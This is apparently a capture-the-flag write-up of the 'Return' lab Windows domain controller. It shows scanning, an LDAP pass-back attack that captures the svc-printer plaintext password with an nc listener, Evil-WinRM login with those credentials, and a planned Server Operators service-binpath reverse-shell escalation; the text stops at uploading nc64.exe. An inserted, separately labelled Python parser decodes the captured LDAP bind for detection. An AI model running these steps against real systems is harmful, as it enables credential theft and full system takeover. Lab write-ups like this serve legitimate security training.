Windows Life from Zero: Return

We who were once boys
will one day become young men.
Growing old, someday like withered leaves,
we rot away with no one knowing.


Target IP: 10.129.217.15

Difficulty: Easy

Topics covered:

Information gathering: port scanning (RustScan/Nmap) and web directory brute-forcing (Feroxbuster).

Credential access: abusing the printer admin panel's settings.php to perform an LDAP Pass-back attack and capture a plaintext username and password.

Initial access: logging in as the svc-printer account with Evil-WinRM.

Privilege escalation: abusing Server Operators group membership to reconfigure a system service (sc config) and escalate to SYSTEM.


1. Perimeter Reconnaissance and Service Fingerprinting

RustScan full-port scan:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 10.129.217.15 -r 1-65535 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.217.15:53
Open 10.129.217.15:80
Open 10.129.217.15:88
Open 10.129.217.15:135
Open 10.129.217.15:139
Open 10.129.217.15:389
Open 10.129.217.15:445
Open 10.129.217.15:464
Open 10.129.217.15:593
Open 10.129.217.15:636
Open 10.129.217.15:3268
Open 10.129.217.15:3269
Open 10.129.217.15:47001
Open 10.129.217.15:49666
Open 10.129.217.15:49668
Open 10.129.217.15:49664
Open 10.129.217.15:49665
Open 10.129.217.15:49676
Open 10.129.217.15:49679
Open 10.129.217.15:49671
Open 10.129.217.15:49675
Open 10.129.217.15:49674
Open 10.129.217.15:49694
Open 10.129.217.15:63229
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-14 21:13 EST
Initiating Ping Scan at 21:13
Scanning 10.129.217.15 [4 ports]
Completed Ping Scan at 21:13, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:13
Completed Parallel DNS resolution of 1 host. at 21:13, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:13
Scanning 10.129.217.15 [24 ports]
Discovered open port 80/tcp on 10.129.217.15
Discovered open port 445/tcp on 10.129.217.15
Discovered open port 139/tcp on 10.129.217.15
Discovered open port 53/tcp on 10.129.217.15
Discovered open port 636/tcp on 10.129.217.15
Discovered open port 135/tcp on 10.129.217.15
Discovered open port 49664/tcp on 10.129.217.15
Discovered open port 464/tcp on 10.129.217.15
Discovered open port 3269/tcp on 10.129.217.15
Discovered open port 49666/tcp on 10.129.217.15
Discovered open port 47001/tcp on 10.129.217.15
Discovered open port 49676/tcp on 10.129.217.15
Discovered open port 389/tcp on 10.129.217.15
Discovered open port 63229/tcp on 10.129.217.15
Discovered open port 49668/tcp on 10.129.217.15
Discovered open port 49694/tcp on 10.129.217.15
Discovered open port 49675/tcp on 10.129.217.15
Discovered open port 88/tcp on 10.129.217.15
Discovered open port 593/tcp on 10.129.217.15
Discovered open port 49674/tcp on 10.129.217.15
Discovered open port 49665/tcp on 10.129.217.15
Discovered open port 49679/tcp on 10.129.217.15
Discovered open port 49671/tcp on 10.129.217.15
Discovered open port 3268/tcp on 10.129.217.15
Completed SYN Stealth Scan at 21:13, 0.19s elapsed (24 total ports)
Nmap scan report for 10.129.217.15
Host is up, received echo-reply ttl 127 (0.091s latency).
Scanned at 2026-01-14 21:13:52 EST for 0s

PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
80/tcp open http syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
49674/tcp open unknown syn-ack ttl 127
49675/tcp open unknown syn-ack ttl 127
49676/tcp open unknown syn-ack ttl 127
49679/tcp open unknown syn-ack ttl 127
49694/tcp open unknown syn-ack ttl 127
63229/tcp open unknown syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
Raw packets sent: 28 (1.208KB) | Rcvd: 25 (1.084KB)

RustScan handing the open ports to Nmap for detailed probing (-A -sV -sC):

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 10.129.217.15 -r 1-65535 --ulimit 5000 -- -A -sV -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.217.15:80
Open 10.129.217.15:88
Open 10.129.217.15:135
Open 10.129.217.15:139
Open 10.129.217.15:389
Open 10.129.217.15:593
Open 10.129.217.15:636
Open 10.129.217.15:3268
Open 10.129.217.15:3269
Open 10.129.217.15:5985
Open 10.129.217.15:9389
Open 10.129.217.15:53
Open 10.129.217.15:464
Open 10.129.217.15:445
Open 10.129.217.15:47001
Open 10.129.217.15:63229
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A -sV -sC" on ip 10.129.217.15
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-14 21:15 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:15
Completed NSE at 21:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:15
Completed NSE at 21:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:15
Completed NSE at 21:15, 0.00s elapsed
Initiating Ping Scan at 21:15
Scanning 10.129.217.15 [4 ports]
Completed Ping Scan at 21:15, 1.65s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:15
Completed Parallel DNS resolution of 1 host. at 21:15, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:15
Scanning 10.129.217.15 [16 ports]
Discovered open port 53/tcp on 10.129.217.15
Discovered open port 80/tcp on 10.129.217.15
Discovered open port 135/tcp on 10.129.217.15
Discovered open port 139/tcp on 10.129.217.15
Discovered open port 63229/tcp on 10.129.217.15
Discovered open port 445/tcp on 10.129.217.15
Discovered open port 464/tcp on 10.129.217.15
Discovered open port 5985/tcp on 10.129.217.15
Discovered open port 9389/tcp on 10.129.217.15
Discovered open port 389/tcp on 10.129.217.15
Discovered open port 88/tcp on 10.129.217.15
Discovered open port 3268/tcp on 10.129.217.15
Discovered open port 47001/tcp on 10.129.217.15
Discovered open port 636/tcp on 10.129.217.15
Discovered open port 593/tcp on 10.129.217.15
Discovered open port 3269/tcp on 10.129.217.15
Completed SYN Stealth Scan at 21:15, 0.21s elapsed (16 total ports)
Initiating Service scan at 21:15
Scanning 16 services on 10.129.217.15
Stats: 0:00:46 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 93.75% done; ETC: 21:16 (0:00:03 remaining)
Completed Service scan at 21:16, 57.06s elapsed (16 services on 1 host)
Initiating OS detection (try #1) against 10.129.217.15
Retrying OS detection (try #2) against 10.129.217.15
Initiating Traceroute at 21:16
Completed Traceroute at 21:16, 0.09s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:16
Completed Parallel DNS resolution of 2 hosts. at 21:16, 0.00s elapsed
DNS resolution of 2 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 2, DR: 0, SF: 0, TR: 2, CN: 0]
NSE: Script scanning 10.129.217.15.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:16
Completed NSE at 21:16, 9.36s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:16
Completed NSE at 21:16, 2.46s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:16
Completed NSE at 21:16, 0.00s elapsed
Nmap scan report for 10.129.217.15
Host is up, received reset ttl 127 (0.088s latency).
Scanned at 2026-01-14 21:15:24 EST for 72s

PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-01-15 02:34:06Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
63229/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2016 (96%), Microsoft Windows Server 2019 (96%), Microsoft Windows 10 (93%), Microsoft Windows 10 1709 - 21H2 (93%), Microsoft Windows 10 1903 (93%), Microsoft Windows 10 21H1 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2022 (93%), Windows Server 2019 (92%), Microsoft Windows Vista SP1 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=1/14%OT=53%CT=%CU=42462%PV=Y%DS=2%DC=T%G=N%TM=69684E04%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=S%TS=U)
SEQ(SP=104%GCD=2%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=U)
OPS(O1=M542NW8NNS%O2=M542NW8NNS%O3=M542NW8%O4=M542NW8NNS%O5=M542NW8NNS%O6=M542NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M542NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 43714/tcp): CLEAN (Couldn't connect)
| Check 2 (port 24974/tcp): CLEAN (Couldn't connect)
| Check 3 (port 54529/udp): CLEAN (Failed to receive data)
| Check 4 (port 51924/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 18m33s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-01-15T02:35:03
|_ start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 83.25 ms 10.10.14.1
2 83.56 ms 10.129.217.15

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:16
Completed NSE at 21:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:16
Completed NSE at 21:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:16
Completed NSE at 21:16, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.35 seconds
Raw packets sent: 62 (4.092KB) | Rcvd: 61 (3.808KB)

Port combination: 53 (DNS), 88 (Kerberos), 389 (LDAP) and 445 (SMB) are all open together. This is the classic signature of a Windows Domain Controller, which means we are facing not just an ordinary server but the core of the domain environment.

Remote management entry points

  • 5985 (WinRM): the Windows Remote Management service is exposed. This is a key finding: compared with SMB (445), where command execution goes through PsExec-style techniques that AV readily blocks, WinRM is Windows' native management protocol, so once we have credentials, logging in through Evil-WinRM is usually more stable and less conspicuous.
  • 593 (HTTP-RPC-EPMAP): RPC over HTTP, also common in domain environments and typically used for DCOM communication.

Add the domain names from the scan to /etc/hosts:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# echo "10.129.217.15 return.local printer.return.local" | tee -a /etc/hosts
10.129.217.15 return.local printer.return.local

2. Service Enumeration and Web Probing

SMB service probing:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.217.15
SMB 10.129.217.15 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -L //10.129.217.15
Password for [WORKGROUP\root]:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.217.15 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Anonymous access gets us nothing here: the null session is accepted, but no shares are listed.

Full enum4linux sweep:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# enum4linux -A 10.129.217.15
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jan 14 21:20:57 2026

=========================================( Target Information )=========================================

Target ........... 10.129.217.15
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


===========================( Enumerating Workgroup/Domain on 10.129.217.15 )===========================


[E] Can't find workgroup/domain



===================================( Session Check on 10.129.217.15 )===================================


[+] Server 10.129.217.15 allows sessions using username '', password ''


================================( Getting domain SID for 10.129.217.15 )================================

Domain Name: RETURN
Domain Sid: S-1-5-21-3750359090-2939318659-876128439

[+] Host is part of a domain (not a workgroup)

enum4linux complete on Wed Jan 14 21:21:09 2026

Nothing of value was found, so let's try brute-forcing usernames (RID cycling) with the guest account.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb return.local -u guest -p '' --rid-brute
SMB 10.129.217.15 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.129.217.15 445 PRINTER [-] return.local\guest: STATUS_ACCOUNT_DISABLED

The guest account is disabled, so the only option left is to look at port 80 for anything useful.

Directory brute-forcing:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# feroxbuster -u http://10.129.217.15 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,zip,txt,html,htm --scan-dir-listings -C 503,404

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.129.217.15/
🚩 In-Scope Url │ 10.129.217.15
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
💢 Status Code Filters │ [503, 404]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
📂 Scan Dir Listings │ true
💲 Extensions │ [php, zip, txt, html, htm]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 151c http://10.129.217.15/images => http://10.129.217.15/images/
200 GET 1376l 2855w 29090c http://10.129.217.15/settings.php
200 GET 39l 196w 17216c http://10.129.217.15/images/1.png
200 GET 1345l 2796w 28274c http://10.129.217.15/index.php
200 GET 1345l 2796w 28274c http://10.129.217.15/
301 GET 2l 10w 151c http://10.129.217.15/Images => http://10.129.217.15/Images/
200 GET 1345l 2796w 28274c http://10.129.217.15/Index.php
301 GET 2l 10w 151c http://10.129.217.15/IMAGES => http://10.129.217.15/IMAGES/
200 GET 1345l 2796w 28274c http://10.129.217.15/INDEX.php

3. Exploitation and Credential Access

Focus on settings.php.

The page has an "Update" button; capture the request to see what it actually does:

POST /settings.php HTTP/1.1
Host: 10.129.217.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Origin: http://10.129.217.15
Connection: keep-alive
Referer: http://10.129.217.15/settings.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i

ip=printer.return.local

Only the ip parameter is sent; the username and password fields on the form are just decoration.

So what happens if we set ip to the attacking machine's IP and listen on port 389 with nc?

The formal name for this step is an LDAP Pass-back (Rogue LDAP Server) attack.

Root cause: when "Update" is clicked, the backend PHP logic, in order to check that the "server address" is valid, attempts an LDAP Bind using the user-supplied IP together with the currently saved credentials (User/Pass).

Why plaintext? LDAP authentication is generally either Simple Bind (plaintext or only trivially protected) or SASL (e.g. NTLM/Kerberos).

  • When we listen with nc -lvnp 389, we are effectively impersonating an LDAP server.
  • The victim (the printer panel) opens a TCP connection to our IP.
  • Inside the garbage that starts with 0* in the nc output, the plaintext password 1edFg43012!! is visible, which proves the target performed an LDAP Simple Bind. Had it used NTLM, we would have seen a hash challenge instead and would have needed a tool such as Responder to capture and crack it rather than reading it straight out of nc.
  • Conclusion: this is a misconfiguration. The application uses insecure plaintext LDAP authentication on the internal network, so by tricking the target into connecting to a rogue server we intercepted the credentials directly.
┌──(root㉿kaada)-[/opt/BurpSuitePro]
└─# nc -lvnp 389
listening on [any] 389 ...
connect to [10.10.14.70] from (UNKNOWN) [10.129.217.15] 61769
0*`%return\svc-printer�
1edFg43012!!


We have successfully received a set of login credentials!
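To make the nc capture above legible, here is an added example (my own, not part of the original write-up) that decodes what nc printed as an RFC 4511 BindRequest: `0*` is the SEQUENCE tag 0x30 with length 0x2a, `` `% `` is the [APPLICATION 0] BindRequest tag 0x60 with length 0x25, and the password sits in the [0] simple-authentication field with no protection at all. The byte string is reconstructed from the capture; the SASL sample and the alert rule are constructed to show what a defender's 389 sensor should flag.

```python
from __future__ import annotations

from dataclasses import dataclass


def read_tlv(buf: bytes, pos: int) -> tuple[int, bytes, int]:
    """Read one BER tag/length/value starting at buf[pos]; return (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length octets that follow
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated BER element")
    return tag, value, pos + length


@dataclass
class BindRequest:
    message_id: int
    version: int
    name: str
    auth: str               # "simple" or "sasl"
    password: str | None    # cleartext password, present only for simple binds
    mechanism: str | None   # SASL mechanism name, present only for SASL binds


def parse_bind_request(buf: bytes) -> BindRequest:
    """Decode LDAPMessage { messageID, protocolOp = BindRequest } (RFC 4511, section 4.2)."""
    tag, msg, _ = read_tlv(buf, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, mid, pos = read_tlv(msg, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, op, _ = read_tlv(msg, pos)
    if tag != 0x60:  # [APPLICATION 0] is BindRequest
        raise ValueError(f"protocolOp tag 0x{tag:02x} is not a BindRequest")
    _, ver, pos = read_tlv(op, 0)
    _, name, pos = read_tlv(op, pos)
    tag, cred, _ = read_tlv(op, pos)
    message_id, version = int.from_bytes(mid, "big"), int.from_bytes(ver, "big")
    if tag == 0x80:  # [0] simple: the value IS the password
        return BindRequest(message_id, version, name.decode(), "simple", cred.decode(), None)
    if tag == 0xA3:  # [3] sasl: SaslCredentials { mechanism OCTET STRING, credentials OPTIONAL }
        _, mech, _ = read_tlv(cred, 0)
        return BindRequest(message_id, version, name.decode(), "sasl", None, mech.decode())
    raise ValueError(f"unknown AuthenticationChoice tag 0x{tag:02x}")


def is_cleartext_credential_leak(req: BindRequest, dst_port: int) -> bool:
    """Alert rule: a simple bind carrying a non-empty password to plain LDAP (389 or GC 3268)."""
    return req.auth == "simple" and bool(req.password) and dst_port in (389, 3268)


# Reconstructed from the nc capture: "0*" = 0x30 0x2a, "`%" = 0x60 0x25, the unprintable
# byte after the username is the 0x80 [0] tag, and 0x0c is the password length.
CAPTURED_BIND = (
    b"\x30\x2a"                          # LDAPMessage SEQUENCE, 42 bytes
    b"\x02\x01\x01"                      # messageID = 1
    b"\x60\x25"                          # BindRequest, 37 bytes
    b"\x02\x01\x03"                      # version = 3
    b"\x04\x12" b"return\\svc-printer"   # name, 18 bytes
    b"\x80\x0c" b"1edFg43012!!"          # simple authentication: the password, 12 bytes
)

# Constructed contrast: the same client binding with SASL/GSS-SPNEGO (NTLM or Kerberos);
# the credentials field then carries a token, never the password itself.
SASL_BIND = (
    b"\x30\x1c" b"\x02\x01\x01" b"\x60\x17" b"\x02\x01\x03" b"\x04\x00"
    b"\xa3\x10" b"\x04\x0a" b"GSS-SPNEGO" b"\x04\x02" b"\x01\x02"
)

if __name__ == "__main__":
    for raw in (CAPTURED_BIND, SASL_BIND):
        req = parse_bind_request(raw)
        print(req, "-> leak on 389:", is_cleartext_credential_leak(req, 389))
```

The same parser, pointed at a passive capture of port 389 on a real network, identifies every device that still simple-binds with a service account so its configuration can be switched to LDAPS or SASL.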

4. Establishing an Initial Foothold

Now enumerate using this user's identity:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.217.15 -u 'svc-printer' -p '1edFg43012!!' --shares
SMB 10.129.217.15 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.129.217.15 445 PRINTER [+] return.local\svc-printer:1edFg43012!!
SMB 10.129.217.15 445 PRINTER [*] Enumerated shares
SMB 10.129.217.15 445 PRINTER Share Permissions Remark
SMB 10.129.217.15 445 PRINTER ----- ----------- ------
SMB 10.129.217.15 445 PRINTER ADMIN$ READ Remote Admin
SMB 10.129.217.15 445 PRINTER C$ READ,WRITE Default share
SMB 10.129.217.15 445 PRINTER IPC$ READ Remote IPC
SMB 10.129.217.15 445 PRINTER NETLOGON READ Logon server share
SMB 10.129.217.15 445 PRINTER SYSVOL READ Logon server share

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm 10.129.217.15 -u 'svc-printer' -p '1edFg43012!!'
WINRM 10.129.217.15 5985 PRINTER [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
WINRM 10.129.217.15 5985 PRINTER [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)

We have remote login rights, so log in with evil-winrm right away to get a shell:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i 10.129.217.15 -u 'svc-printer' -p '1edFg43012!!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents>

5. Internal Enumeration and Privilege-Escalation Path Analysis

After logging in, check the current identity and privileges with whoami:

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /all

USER INFORMATION
----------------

User Name SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

One of these groups deserves attention:

BUILTIN\Server Operators

This group lets us start/stop/create services, so we can use a service to escalate to SYSTEM.

6. Privilege Escalation: Abusing the Server Operators Group

How service abuse works

  • Goal: Windows services run by default as NT AUTHORITY\SYSTEM, the highest privilege level. If we can control what code a service executes, we effectively control SYSTEM.
  • SCM (Service Control Manager): Windows services are managed by the SCM. Ordinary users cannot modify service configuration.
  • ACL (access control list): the Server Operators group holds SERVICE_CHANGE_CONFIG and SERVICE_START on certain services (or on all of them, depending on configuration).
  • Attack chain:
    1. Target selection: we chose the VSS (Volume Shadow Copy) service. It is a system service that is usually stopped by default, so modifying it has little impact on system stability (in real engagements, prefer a third-party service to avoid damaging system components).
    2. Payload injection: the sc.exe config command rewrites the service's ImagePath (i.e. binpath) in the registry, replacing the legitimate VSS path with our reverse-shell command: cmd.exe /c ... nc64.exe ...
    3. Privilege jump: when we run sc start, the SCM believes it is starting the legitimate VSS service but actually executes our command as SYSTEM.

First, upload nc64.exe:

*Evil-WinRM* PS C:\> mkdir Temp


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/14/2026 8:22 PM Temp


*Evil-WinRM* PS C:\> cd Temp
*Evil-WinRM* PS C:\Temp> upload nc64.exe

